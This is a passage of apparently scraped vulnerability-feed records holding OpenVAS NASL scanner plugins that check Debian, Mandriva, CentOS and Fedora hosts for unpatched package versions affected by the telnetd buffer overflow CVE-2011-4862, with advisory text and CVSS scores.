= isdpkgvuln(pkg:\"inetutils-ftpd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-inetd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ping\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-syslogd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talk\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talkd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnet\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnetd\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-tools\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "Check for the Version of krb5-appl", "modified": "2017-07-06T00:00:00", "published": "2011-12-30T00:00:00", "id": "OPENVAS:831517", "href": "http://plugins.openvas.org/nasl.php?oid=831517", "type": "openvas", "title": "Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks 
GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in krb5-appl,\n heimdal and netkit-telnet:\n\n An unauthenticated remote attacker can cause a buffer overflow and\n probably execute arbitrary code with the privileges of the telnet\n daemon (CVE-2011-4862).\n\n In Mandriva the telnetd daemon from the netkit-telnet-server package\n does not have an initscript to start and stop the service, however\n one could rather easily craft an initscript or start the service by\n other means rendering the system vulnerable to this issue.\n\n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"krb5-appl on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-12/msg00027.php\");\n script_id(831517);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", 
value:\"2011-12-30 09:13:14 +0530 (Fri, 30 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2011:195\");\n script_cve_id(\"CVE-2011-4862\");\n script_name(\"Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\");\n\n script_summary(\"Check for the Version of krb5-appl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"heimdal-daemons\", rpm:\"heimdal-daemons~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel\", rpm:\"heimdal-devel~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel-doc\", rpm:\"heimdal-devel-doc~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftp\", rpm:\"heimdal-ftp~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftpd\", rpm:\"heimdal-ftpd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-libs\", rpm:\"heimdal-libs~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-login\", rpm:\"heimdal-login~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rsh\", rpm:\"heimdal-rsh~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rshd\", rpm:\"heimdal-rshd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-server\", rpm:\"heimdal-server~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnet\", rpm:\"heimdal-telnet~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnetd\", rpm:\"heimdal-telnetd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-workstation\", rpm:\"heimdal-workstation~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet\", rpm:\"netkit-telnet~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet-server\", 
rpm:\"netkit-telnet-server~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal\", rpm:\"heimdal~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881412", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881412", "type": "openvas", "title": "CentOS Update for krb5-appl-clients CESA-2011:1852 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-appl-clients CESA-2011:1852 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-December/018361.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881412\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:49:01 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1852\");\n script_name(\"CentOS Update for krb5-appl-clients CESA-2011:1852 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-appl-clients'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"krb5-appl-clients on CentOS 6\");\n 
script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\n rlogin clients and servers. Kerberos is a network authentication system\n which allows clients and servers to authenticate to each other using\n symmetric encryption and a trusted third-party, the Key Distribution Center\n (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n\n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n\n For users who have installed the krb5-appl-servers package, have\n enabled the krb5 telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n\n All krb5-appl-server users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881380", "type": "openvas", "title": "CentOS Update for krb5-devel CESA-2011:1851 centos4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-devel CESA-2011:1851 centos4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881380\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:55 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1851\");\n script_name(\"CentOS Update for krb5-devel CESA-2011:1851 centos4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-devel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"krb5-devel on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Kerberos is a network authentication system which allows clients and\n servers to authenticate to each other using symmetric encryption and a\n trusted third- party, the Key Distribution Center (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). 
A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n\n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n\n For users who have installed the krb5-workstation package, have\n enabled the telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n\n All krb5-workstation users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:58:02", "bulletinFamily": "scanner", "cvelist": 
["CVE-2011-4862"], "description": "Check for the Version of krb5-appl", "modified": "2017-12-26T00:00:00", "published": "2012-03-19T00:00:00", "id": "OPENVAS:863823", "href": "http://plugins.openvas.org/nasl.php?oid=863823", "type": "openvas", "title": "Fedora Update for krb5-appl FEDORA-2011-17493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5-appl FEDORA-2011-17493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5-appl on Fedora 16\";\ntag_insight = \"This package contains Kerberos-aware versions of the telnet, ftp, rcp, rsh,\n and rlogin clients and servers. 
While these have been replaced by tools\n such as OpenSSH in most environments, they remain in use in others.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071640.html\");\n script_id(863823);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:54 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-17493\");\n script_name(\"Fedora Update for krb5-appl FEDORA-2011-17493\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of krb5-appl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.2~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "Check for the Version of krb5-appl-clients", "modified": "2018-01-01T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881412", "href": "http://plugins.openvas.org/nasl.php?oid=881412", "type": "openvas", "title": "CentOS Update for krb5-appl-clients CESA-2011:1852 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-appl-clients CESA-2011:1852 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\n rlogin clients and servers. Kerberos is a network authentication system\n which allows clients and servers to authenticate to each other using\n symmetric encryption and a trusted third-party, the Key Distribution Center\n (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). 
A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n \n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n \n For users who have installed the krb5-appl-servers package, have\n enabled the krb5 telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n \n All krb5-appl-server users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\";\n\ntag_affected = \"krb5-appl-clients on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-December/018361.html\");\n script_id(881412);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:49:01 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1852\");\n script_name(\"CentOS Update for krb5-appl-clients CESA-2011:1852 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of krb5-appl-clients\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n 
script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-12-30T00:00:00", "id": "OPENVAS:1361412562310831517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831517", "type": "openvas", "title": "Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 
Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-12/msg00027.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831517\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-30 09:13:14 +0530 (Fri, 30 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2011:195\");\n script_cve_id(\"CVE-2011-4862\");\n script_name(\"Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-appl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n 